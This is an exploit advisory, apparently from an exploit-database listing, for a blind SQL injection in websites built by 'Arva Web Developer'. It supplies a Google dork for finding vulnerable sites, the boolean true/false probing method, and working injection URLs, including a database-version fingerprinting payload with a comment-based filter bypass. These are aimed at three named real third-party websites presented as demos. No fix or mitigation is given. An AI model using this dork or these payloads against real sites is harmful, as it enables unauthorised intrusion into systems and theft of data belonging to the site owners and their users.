*********************************************************
#Exploit Title: Arva Web Developer - Blind Sql Injection Vulnerability
#Date: 2022-01-11
#Exploit Author: Behrouz Mansoori
#Google Dork: "Designed & Developed by : Arva Web Developer"
#Category:webapps
#Tested On: windows 10, Firefox
[+] search Dork : "Designed & Developed by : Arva Web Developer"
[+] First add "and true" and then "and false" to the end of the link :
* Target.com/index.php?lang=1 true
* Target.com/index.php?lang=1 false
### Demo 1:
* http://allengeindia.com/product-list.php?cat=8%20and%20true--&cattype=Gynecological
* http://allengeindia.com/product-list.php?cat=8%20and%20false--&cattype=Gynecological
* http://allengeindia.com/product-list.php?cat=8%20and%20/*!12345substring(@@version,1,1)*/=5--&cattype=Gynecological
### Demo 2:
* http://diabetes-cardiac.com/product-list.php?cat=1%20and%20true--
* http://diabetes-cardiac.com/product-list.php?cat=1%20and%20false--
* http://diabetes-cardiac.com/product-list.php?cat=1%20and%20/*!12345substring(@@version,1,1)*/=5--
### Demo 3:
* http://www.zovixpharma.com/product-list.php?cat=4%20and%20true--&cattype=Powder
* http://www.zovixpharma.com/product-list.php?cat=4%20and%20false--&cattype=Powder
* http://www.zovixpharma.com/product-list.php?cat=4%20and%20/*!12345substring(@@version,1,1)*/=5--
*********************************************************
#Discovered by: Behrouz mansoori
#Instagram: Behrouz_mansoori
#Email: mr.mansoori@yahoo.com
*********************************************************